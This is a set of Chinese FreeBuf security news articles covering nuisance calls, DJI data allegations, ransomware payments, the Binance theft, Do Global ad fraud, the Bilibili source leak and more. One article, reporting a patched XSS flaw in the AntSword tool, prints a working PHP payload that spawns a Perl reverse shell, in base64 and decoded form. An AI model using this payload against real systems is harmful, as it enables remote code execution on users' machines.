骚扰电话愈发猖獗大概是隐私泄露问题的真实写照,除了个人隐私意识需要加强之外,电信公司对于骚扰电话的打击力度显然还不够。近期,工信部就骚扰电话管控不力问题约谈了中国电信集团公司和广东、江苏、浙江、四川等问题突出的四省电信公司。

WX20190523-164719@2x.png

由于近期中国电信骚扰电话被投诉举报量快速增长,工信部要求其重点加强语音专线和码号等通信资源的管控,坚决落实治理骚扰电话部署要求,确保短期内见实效,并与四省电信公司签订了《整改承诺书》。

随着微信、QQ逐渐取代电话、短信成为人们日常主要的交流工具,骚扰电话问题显得更加突出,这并不能完全体现由隐私泄露造成骚扰电话更加严重的情况。

2019_03_16_4a710268df5b405aa56c84e061ba78d3.jpeg

笔者翻看手机通话记录,最新的十条中,1条网约车、2条订餐/咖啡、1条快递、1条运营商客服电话以及5条各类推广/贷款类骚扰电话。如果抛开快递和订餐的需求,在网络持续良好的情况下,笔者甚至觉得可以屏蔽一切来电,连短信也不过是为了接受验证码和快递消息而已。

根据《 2019年2月12321举报受理情况播报 》,2019年2月份仅12321举报中心收到的举报涉嫌骚扰电话约3.7万件次,这比近期正在大力整治的APP安全、权限问题收到的举报量还要多近1万件次。

WX20190523-162251@2x.png

在骚扰电话举报情况中,贷款理财类、违规催收类和电话轰炸类的举报 信息居前三位,占比分别为 24.2%、15.7%和 9.3%,前三类占比就几乎占据一半比重。虽然笔者平时很少遭遇电话轰炸和违规催收的情况,但贷款理财类的骚扰电话高居第一位,还是非常现实的。

在今年的315晚会上,揭露了一个鲜为人知产业链,连客服电话都披上了人工智能的外衣,人工智能客服机器人一天能拨打几千条电话,而且普通用户根本区分不出来是真人还是机器人。想想我心情很低落时收到骚扰电话时忍不住会爆几句粗口,真是有点好笑,你跟个机器人较什么劲儿呢?

20188106080621270.jpeg

柯洁尚且承认人类无法超越AlphaGO,消费者又如何去跟一个一天能打几千通电话还不用喝水的机器人去对抗呢。尽管越来越多的智能手机都自带有防骚扰机制,通过设定一些规则能够屏蔽一部分骚扰电话和短信。但仍然有大量骚扰电话号码没有被来电显示库标记类型,基本无法屏蔽。是否也该反思,这些号码都是哪里来的?手机实名制机制全面推行,似乎完全没有遏制骚扰电话的疯长,境内外依然存在大量黑卡被黑灰产利用,从源头上治理骚扰电话,电信运营商首当其冲。

我希望有一天,24小时都没接到一个陌生电话的时候,不是因为手机欠费……

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

“华为事件”的热度丝毫未减,美国似乎又将矛头指向了新的目标——DJI大疆。根据CNN报道的内容,美国国土安全部警告称,中国制造的无人机可以向制造商传输飞行数据,从而可能被政府部门获取。

尽管并未指明哪个品牌,但美国和加拿大投入使用的无人机80%来自大疆。甚至在近几年,美国当地执法机构和基础设施运营商已经逐渐以来无人机。对此,美国国土安全部警告称,这些无人机的存在是信息基础设施的潜在风险。

DJI-local-data-_-featured.jpg

其实这已经不是美国针对中国无人机发表类似的威胁言论或者行动,在2017年,美国陆军就以网络安全为由禁止使用DJI大疆无人机。童年,洛杉矶移民和海关执法机构情报部门的内部报告中提到,“DJI有选择地针对政府或私营实体(包括美国关键基础设施和执法部门),以便收集和利用敏感的美国数据。”

两年前DJI就坚决否认了这种指控,表示“技术的安全性已得到美国政府的验证”。这两年的时间来看,这些威胁论似乎并没有影响大疆无人机在美国市场的火热程度。

dji-logo.jpg

时隔两年,美国再次玩弄这种威胁论的套路,却依然没看到实质证据。面对这种无端指控,大疆官方回应如下:

DJI大疆创新一直以来高度重视信息安全问题,我们技术的安全性已经在全球得到反复验证,其中也包括美国政府和美国领先企业的独立验证。

当用户使用DJI大疆创新的无人机或其他技术产品时,所生产、存储和传输的数据都完全由用户掌握。

此外,DJI大疆创新还提供特殊的模式以满足不同客户的信息安全管理需要,比如断开网络连接的本地数据模式、私有云部署模式等等。

全球大量机构每天都在使用DJI大疆创新的技术,以提高生产效率,保障生产安全,甚至是拯救生命。

DJI大疆创新将持续与全球的客户及政府管理部门合作,确保我们能满足不同地区不同行业的技术规范以及信息安全需要。

恰逢贸易战升级,华为被美国政府列入所谓的“实体清单”,大疆无人机威胁论再起,下一个又会是谁?

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

加密货币的出现,尽管不是导致勒索软件越来越泛滥的直接原因,但无疑给勒索软件提供了绝佳的交易方式。ProPublica最新的研究发现,多数数据恢复公司或者提供勒索软件解决方案的公司都有一种另类的方式——支付赎金。

当遭遇勒索软件,是否支付赎金以便恢复数据?看起来简单,但其实也是一个比较难以选择的问题。

在选择支付赎金之前,谁也没办法肯定黑客会及时提供解密工具,解密工具是否有效以及能恢复多少数据,这些都是必须关注的问题。毕竟你面对的是未知的身份,即便黑客在收到赎金之后消失你也无可奈何。

ransomware-1.jpg

根据Coveware的调查,2019年Q1季度,勒索软件的平均赎金相比前一季度增长接近一倍(89%),已经达到了12762美元。同时勒索润年导致的停机时间也从2018年Q4季度的6.2天增加到了7.3天。

Ransomware+Downtime+Costs+Q1+2019.png

一般企业在遭遇勒索攻击之后,停机时间越久损失越大,支付赎金同样也会根据所带来的损失成本去斟酌,理想情况是,及时支付赎金之后顺利恢复数据保障业务正常进行,这可能会比寻找其他解密途径或者使用其他恢复方案更加划算。

那么,哪些支付赎金的企业或者叫机构结果又如何?

Ransomware+Data+Recovery+Rate+Q1+2019.png

Coveware数据显示,2019年Q1季度,96%支付赎金的公司收到了一份有效的解密工具,同时受害者使用解密工具平均恢复了93%的数据。因为勒索软件的种类不一样,数据恢复程度也不大一样。例如Ryuk勒索软件数据恢复率平均只有80%,而GandCrab则接近100%。数据丢失一般是由于加密过程中导致文件损坏或者擦除导致的,部分解密工具也容易出错。

做一个不大恰当的比喻,把勒索攻击作为一笔生意的话,黑客也需要诚信,他需要在收到受害者的赎金之后尽可能顺利的为其解密,这样才能保证黑客能够通过勒索软件获得收益。

而从安全人员角度来讲,尽管支付赎金看起来是最简单最有效的解密方式,但却不是一个好的趋势。黑客收到持续赎金之后,便有了更多的成本去开发新的勒索软件以获取持续收益,这是一个恶性循环。

ransomware-note-1800*1200-57bb6f.jpg

从目前的情况来看,仍然没有一个绝对有效的勒索软件解决方案存在。黑客所使用的加密方式也越来越复杂,想要直接破解也越来越难,即便被破解之后,黑客稍微做一些改进便又是新一代勒索软件,例如GandCrab目前已经发展到了V5.2版本。

许多安全研究员热衷于破解勒索软件,并提供免费的解密工具,对于正在遭受勒索攻击的企业而言,等待安全研究人员的破解存在太多不确定性,时间成本以及最终的解密效果都不确定甚至还可能导致不可逆的数据损坏。

4162.jpg

应对勒索软件泛滥成灾的情况,逐渐出现一些公司宣称提供有效的勒索软件解决方案。ProPublica 披露美国两家涉嫌诈骗的公司Proven Data 和 MonsterCloud,他们声称有自己的数据恢复方法来应对软件勒索,但最终追踪调查发现,他们所谓的解决方案就是支付赎金,但并未告知受害者,在向黑客支付赎金成功解密数据之后向受害者收取更高价的佣金。

不知道你们怎么看,反正我觉得这个所谓的解决方案的套路有点骚……

通篇看下来,笔者并非在鼓励企业在遭遇勒索攻击之后及时支付赎金来快速解决问题。这其实有点无奈,多数企业在遭遇勒索攻击之后只有支付赎金或者恢复数据两种途径,假如没有做好足够的预防、备份工作,不可否认在保证重大业务正常运转的需求下,支付赎金可能是最直接有效的方法。

目前,绝大多数勒索软件解决方案基本是在预防阶段,要应对勒索软件的解密工作并不现实。还是回到那句话,预防通常比治疗更好,安全工作都是如此。

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

近期,中美关系再次变得紧张,特朗普宣布加征关税,美国也联合其他三十多个国家发起“布拉格提案”,试图以此来限制其他国家在5G建设中采用华为设备。除此之外,中国移动在2011年向FCC提出在美运营的申请,时隔八年之后,等来一纸禁令。

dims.jpeg

早在2011年,中国移动就试图进入美国市场,于是便向美国联邦通信委员会(FCC)提出申请,希望为美国与其他国家的通信提供服务。而在本周四,FCC委员会的五名成员一致投票否决了该申请,也让中国移动等待了八年的希望彻底破灭。

FCC方面表示,如果批准该申请,中国移动将拥有直接接触美国电话线路、光纤网络、手机网络及通讯卫星的渠道,这可能会对美国国家安全产生威胁。这一次,美国将对付华为、中兴的手段用在了中国移动身上。

gettyimages-1044056960-e1555530748828.jpg

在正式否决结果出来的一个月前,FCC 主席 Ajit Pai 就已经公开表示,自己反对中国移动在美国境内提供电信服务。根据其声明内容,2018年7月份,美国情报部门也以国家安全为由建议委员会拒绝中国移动的申请。

Ajit Pai 称:“中国政府可能利用中国电信商,在美国进行危及我们国家安全、经济利益及执法的严重行动。 此外,中国政府也可能不当利用美国的电话线路来增强对美国政府单位的情报搜集。”

在美国政府大规模禁止华为、中兴参与5G网络建设滞后,FCC的这项决定成为了美国打击中国电信运营商的最新行动。Ajit Pai 表示FCC将开始检验5G网络基础建设与技术的安全性。

除了中国移动之外,FCC专员 Brendan Carr 表示美国应该针对中国联通与中国电信集团之前提出的类似申请案进行调查。

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

能真正玩得转加密货币的人都是聪明人,而能从这一堆聪明人中卷走一笔巨款而还能全身而退的,大概只有黑客了,这次他们又从币安提走了7000比特币,价值近4100万美元。 

Binance-1520x1024.jpg

今天早间,币安发布公告称,发现大规模的系统性攻击,黑客通过网络钓鱼、病毒等多种攻击手段卷走了7000比特币。受此影响,BTC在一小时内下跌3%,加密货币均有所下滑,当前市值前100的主流货币中超7成出现下跌。

914aaf3b-d6d2-4a3d-9ab2-8f7251a324cb.png

数据截止今日08:24

在5月8日凌晨1:15:24,币安发现黑客的异常行为。几个小时内,BTC热钱包产生大规模的交易,超过7074比特币被提走。如此大规模的提款,也直接触发了日本加密货币交易所的安全警报,但为时已晚,仍然不能阻止交易完成。转账记录如下:

https://www.blockchain.com/btc/tx/e8b406091959700dbffcff30a60b190133721e5c39e89bb5fe23c5a554ab05ea

WX20190508-152343.png

于是,币安管理员立即暂停充值和提现,将网站置于维护模式,以便调查离开平台的巨额资金。被盗的这7000多比特币,占据币安BTC总持股量的2%。加密投资银行 Galaxy Digital创始人Michael Novogratz回复称:“当世界上最大交易所发生盗窃事件,2%也会带来很大的影响,这是难以避免的结果,也肯定会带来监管机构更多的审查。”

根据币安公告中透露,在本次攻击中,黑客能够获得大量用户API密钥,谷歌验证2FA码以及其他相关信息;黑客团体使用了复合型的攻击技术,包括网络钓鱼,病毒等其他攻击手段。目前,被盗的7000比特币分散在数十个黑客控制的钱包地址中,还没有发生转移。

WX20190508-160833.png

币安CEO赵长鹏在推特直播中标示,在此之前,黑客就已经发现了系统安全漏洞,一直等到系统出现大额交易才下手盗币。同时,赵长鹏建议用户及时更改API密钥、2FA代码。

为了打击黑客的盗币行为,部分交易所表示会联合阻止这些已知的黑客控制的钱包地址的交易行为。

而对于这次黑客攻击所造成的损失,币安表示将使用SAFU基金全额承担,不会有任何用户损失。SAFU是一种面向用户的安全资产基金,是一种应急保险基金。

WX20190508-161512@2x.png

值得一提的是,波场TRON(TRX)创始人在社交平台公开表示,将存入7000比特币等值的4000万美元进入币安,用于增持BNB。

在本次事故发生之后,币安预计将暂停提款一周,期间将进行安全审查,主要三项善后措施如下:

1.我们将进行彻底的安全审查。安全审查将包括我们系统和数据的所有部分。这些部分的数据量很大,预估需要大约一周。

2.在这一周内,充值和提现将处于暂停状态。在这种困难的情况下,给大家带来不便,敬请谅解。

3.另外需要注意,黑客可能仍会控制某些用户帐户,并可能在此期间使用这些帐户来影响价格。但我们正在密切关注这一情况。相信在提现禁止的情况下,黑客没有太大的动力去影响市场。

没记错的话,这已经是币安发生的第三次重大安全事故,均对币市产生了不小的震动。最近半年,加密货币热度虽然有明显下降趋势,但只要有一丝利益尚存,黑暗之中依然有黑客盯着你。

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

此前有数据显示,在2017年我国网络安全领域人才缺口就已经达到了70万,2020年预计将翻倍增至140万。网络安全是全球性问题,不仅仅是在中国,美国也同样面临同样困境。

5月2日,美国总统特朗普签署一份行政令,争取通过规范网络安全的政府间语言、激励学术界和联邦机构的参与、加速学习等方面的新举措,满足国家填补网络安全劳动力空缺的迫切需要。特朗普发表声明称现在美国有超过30万个网络安全职位空缺;这些空缺必须尽快得到填补,才能保护美国的关键基础设施、国防和生活方式。

1024543145.jpg

特朗普发布声明称,现在美国有超过30万个网络安全职位空缺,这些空缺必须得到填补,以保护美国的关键基础设施、国防和美国人的生活方式。“美国建立了互联网并与世界分享;现在,我们将竭尽全力为后代保护和保护网络空间。”特朗普在声明中表示。

白宫官员在电话记者会上介绍,特朗普的这项行政令扩大了旨在发展和加强美国网络劳动力的国家层面的努力。该行政令提出了多项新举措,希望以此加强政府的网络安全工作。比如,在国家标准与技术研究所(NIST)的帮助下,特朗普政府将制定标准课程和共同语言,进行网络安全人员的招募、培养,以形成更广泛,更多样化的网络安全人才库。政府还鼓励广泛采用国家网络安全教育计划(NICE)创建的网络安全劳动力框架。

政府将每年举行总统杯网络挑战,奖励顶级的政府网络安全工作人员;还将设立网络安全教育奖项目,对相关领域表现优秀的中小学教育者进行奖励。政府还会努力提高政府网络安全职位的薪酬水平,以满足市场对这些高技能工人的需求。此外,政府正在制定一项联邦轮换计划,其中联邦政府雇员可以通过其他机构内的临时网络相关任务扩展其专业知识,以鼓励网络安全人才提高技能、促进机构间人才转移。

白宫在关于该行政令的情况简报书中特别提到,总统在去年(2018年)发布的国家安全战略中强调将网络安全作为优先事项。他公布了15年来第一个美国国家网络战略,其中包括优先培养优秀的网络安全工作人员。

a820338bb6184663874c0f14f8923ac5.jpeg根据此前国内的数据统计,我国在2017年网络安全人才需求已经达到70万,预估在2020年将增加值140万。随着网络安全被逐渐提升到国家战略层面,我国也在近两年开始大力推进网络安全人才培养。不仅如此,还有各大企业为了储备足够的人才,也通过与高校或者企业之间的合作打造网络安全人才培养计划。在多方共同努力下,未来这一现状或许能够得到很好的缓解。

*参考来源:侨报网,转载请注明来自FreeBuf.COM

本月中旬,外媒BuzzFeed News报道称Google Play商店中部分热门应用存在广告欺诈及滥用权限的问题,其中有六款属于百度子公司Do Global。而到今天为止,该公司多达46款应用已经全部从Google Play中消失,包括最受欢迎的ES 文件浏览器。

sub-buzz-27919-1555513359-7.jpg

根据Check Point 研究员的分析,这些问题应用内含的代码会导致用户在不知情的情况下自动点击广告,甚至不需要打开 app。

preamo-malware-18.png

模拟点击

研究员将此类恶意组件命名为“PreAMo”,有三部分代码组成,分别负责处理三个不同的广告代理商(Admob、Presage、Mopub),这三部分代码都与同一个C&C 服务器 (res.mnexuscdn[.]com)通信,负责发送统计信息和接收配置。一旦检测到广告加载,PreAMo 会利用类似MotionEvent的功能来模仿用户行为去点击广告。

sub-buzz-3084-1555519293-3.jpg

这一系列潜在发生的行为还会导致用户手机电池耗电量增加,消耗更多的数据流量。

除了这种点击广告的欺诈手段之外,Do Global旗下部分软件还普遍存在权限滥用的问题,例如其中一个手电筒应用 AIO Flashlight 获取了31权限,其中7个属于危险权限。

据了解,Do Global在Google Play中拥有近100款应用,安装量超过6亿。目前Google已经下架其中46款,并且BuzzFeed News还发现,DO Global应用程序不再提供通过Google AdMob网络购买的广告资源,这表明禁令也已扩展到Google的广告产品。

sub-buzz-11899-1556047419-2.jpg

根据资料显示,2018年5月份,百度宣布分拆旗下国际业务中的全球移动应用及DAP广告平台业务,融资成立新公司小熊博望并独立运营,原百度国际事业部总经理胡勇担任CEO。而Do Global品牌正是属于小熊博望,专注于海外移动应用开发及移动出海广告平台的运营。

WX20190428-150613.png

百度仍然持有这家新公司34%的股份,是其重要股东。而在媒体持续曝光之后,Do Global也正式公开道歉,承认了旗下部分应用的广告违规行为,表示会对涉及的每个应用进行彻查。

截止笔者发稿前,Do Glabal官网所有页面全部指向这则致歉声明。

WX20190428-163536@2x.png

值得一提的是,可能是受到Do Global负面的波及,Google Play中下载量过亿的热门应用ES文件管理器也已经被下架。

*参考来源:BuzzFeed News,本文作者 Allen别bb,转载请注明来自FreeBuf.COM

4月22日下午,哔哩哔哩后台源码在GitHub上“被开源”,引发了很多用户关注,而在暴露长达数小时之后,该项目悉数被屏蔽,包括大量用户Fork的部分也无法访问。而在晚间哔哩哔哩通过官方微博发布针对该事件的回应,却又在几分钟后秒删。这一波操作,笔者是在看不懂了……

下午有用户在微博上爆料B站后台源码被泄露,甚至还包含部分用户名和密码。笔者在知晓该事件之时,泄露原地址已无法访问,而不少用户Fork版本还能够看到些“东西”。

005BYqpgly1g2bh4stjeej30ko10ktem.jpg根据能看到的历史截图,一名“openbilibili”的用户创建了“go-common”的代码库,同时该项目描述为清晰写着“哔哩哔哩 bilibili 网站后台工程 源码”。既然创建了“openbilibili”的用户名以及这项目描述,基本可以断定应该是有意而为之,至于后来网上所传言的什么“实习生失误操作”并不可信。

WX20190422-203818.pngkhzd-hvvuiyn5712419.jpg仔细查看该项目内容,还包含有各部分项目详细的负责人姓名拼音,源码内还包含部分用户名和密码。看来这次事件不大简单……

WX20190422-205346.png

随着事件逐渐发酵,关于该泄露项目所有内容均已被屏蔽,甚至连起初爆料的微博也已经被删除,微博上也很快无法搜索到这次事件的相关内容。看起来B站已经在进行紧急处理了。

WX20190422-200554@2x.png

这次看起来比较严重的事件,外界可能更想看到官方是如何回应,用户账户安全是否受到影响。而让人非常不解的是,在晚间7:50左右,哔哩哔哩通过官方微博发布一条针对这次泄露事件的回应声明称,“该部分代码属于较老的历史版本,已执行主动防御措施”。但几分钟之后,这条微博被删除;晚间8:20左右,官博再次发布相同的声明截图,数分钟后又再次删除。

这波操作,笔者真的看不懂了……

不只是回应不当还是有其他原因,B站的两次秒删让人更加怀疑这次事件的起因。截止稿件发布之时(21:05),哔哩哔哩官博还未发布新的声明。

FreeBuf也会持续关注该事件发展,希望B站能够尽快做好安全措施,尽可能降低此次事件可能造成的威胁。而事件源头,或许也是B站正在竭力调查,期待正式回应,给“这个瓜”做个了结。

彩蛋

部分吃瓜群众,还对这次泄露的源码分析一波,发现不少“彩蛋”……

6856d0b6gy1g2bjwxoi6zj215a0wuq6g.jpg0071ouepgy1g2bk4hpk37j30xk0u078l.jpg:Users:andy:Desktop:0071ouepgy1g2bjxanbgyj30qm0di42e.jpg

截图来自V2EX

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

4月12日凌晨,有用户在中国蚁剑GitHub上提交了issue,称发现中国蚁剑存在XSS漏洞,借此可引起RCE。据悉,该漏洞是因为在webshell远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。

ant.jpg

当通过中国蚁剑连接webshell,出现连接失败情况时,中国蚁剑会返回错误信息,如下图:

2

而该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹攻击者的shell。

<?php
header('HTTP/1.1 500 <img src=# onerror=alert(1)>');

反弹shell的exp (for perl)如下,使用base64编码:

<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>");
?>

base64_decode code

require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });

成功反弹攻击者shell:

在该漏洞问题被提出之后,中国蚁剑的作者在今天上午对该问题及时做出了响应,并且及时发布了中国蚁剑的新版本 AntSword v2.0.7.1

WX20190412-132416@2x.png

在最新的版本中,为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html。对于所有使用中国蚁剑旧版本的用户,建议及时更新到最新版本。

参考链接

1.https://github.com/AntSwordProject/antSword/issues/147

2.https://www.jianshu.com/p/6457e8b4a16b

*本文作者:Allen别bb,转载请注明来自FreeBuf.COM

截止笔者发稿之时,“996.ICU”项目在GitHub上获得的Star数量已经超过160000。

本以为“996.ICU”这个热度差不多也快过去了,没想到却因为国内各大互联网公司的一波操作而重新被推上热点——腾讯、360、搜狗等各大公司在自家社交软件、浏览器等产品上屏蔽了“996.ICU”项目地址,并标记为不安全。

hu.jpg

网友测试多个浏览器对“996.ICU”项目地址屏蔽情况(点击查看大图)

某网友安装多个国内外手机浏览器进行测试,访问“996.ICU”GitHub项目地址,发现国内360浏览器、QQ浏览器、猎豹浏览器、2345浏览器等均对该地址进行了屏蔽,标记为不安全,各自的说法也大体一样,“存在违法信息”、“该网站时恶意网站”、“扫黄打非提示”等等。

不过与该网友测试截图中搜狗浏览器结果不同的是,笔者亲测搜狗浏览器访问该地址显示为恶意网址。除了手机端之外,PC端国产浏览器访问“996.ICU”项目地址也均被屏蔽,而Chrome、Firefox以及Microsoft Edge浏览器均可正常打开。

55379118-5bf36a80-554e-11e9-83c5-f79467d0f6d5.png

WechatIMG99.jpg而在笔者常用的腾讯两款社交软件TIM、微信上,均无法在应用内打开“996.ICU”的项目地址,提示包含不安全内容,已停止访问。

55374463-1da08000-553b-11e9-867f-0c355ad6e834.png

而在所有浏览器“打不开”该项目地址的提示中,360浏览器(包括360极速浏览器和360安全浏览器)比较有意思了,Windows端访问直接跳转GitHub 404页面,而此前网友反映是直接被屏蔽,停止访问。值得一提的是,在Mac端360浏览器均可正常访问。

未标题-1.gif360极速浏览器(Windows)访问996.ICU项目地址演示

仔细观察上方GIF图的展示,你会发现输入996.ICU项目地址之后,浏览器其实是已经进入原项目页面的,地址栏有一瞬间出现“危险网站”的提示,随后直接跳转到404页面。而正常的套路下,不实在用户主动访问危险网站的时候跳出安全页面提醒,同时告知用户停止访问。

反正这波操作我是看不懂……

目前,各大互联网公司均只屏蔽了996.ICU的GitHub项目地址,即:https://github.com/996icu/996.ICU,而“996.ICU”域名并没有被屏蔽。这一系列举措让众多该项目支持者不满,纷纷表示卸载这些国产浏览器来抵制这次屏蔽事件,颇有些当初美国民众“去Facebook热”的感觉。

WX20190403-172757.png

996.ICU域名及GitHub项目之所以能迅速走红,很大程度上因为996的工作周期在部分互联网公司非常普遍,该项目的出现引发了很多人的共鸣,试图也借此表达抗议。而该项目本身并不不包含恶意行为,同时浏览器、社交软件的屏蔽行为及理由难免让人觉得牵强,进一步导致了一众支持者的不满。

截止笔者发稿之时,各大公司暂未对屏蔽一事作公开回应,“996.ICU”GitHub项目Star数还在快速增加……

*本文作者:Allen瞎bb,本文仅代表作者个人观点,不表示FreeBuf支持该立场